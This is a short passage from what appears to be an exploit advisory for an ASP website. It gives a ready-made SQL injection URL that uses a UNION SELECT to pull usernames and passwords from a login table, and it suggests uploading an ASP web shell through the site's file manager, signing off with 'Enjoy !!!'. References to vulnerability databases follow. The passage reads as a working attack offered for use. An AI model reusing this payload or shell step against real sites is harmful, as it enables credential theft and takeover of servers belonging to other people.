Example :
http://www.xxx.dk/index.asp?sideid=28+union+select+concat(username,0x3a,pas
sword),2,3+from+login/*
You can upload an asp shell through file manager
Enjoy !!!
References :
http://xforce.iss.net/xforce/xfdb/44981
http://www.securityfocus.com/bid/31084
http://www.milw0rm.com/exploits/6405
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.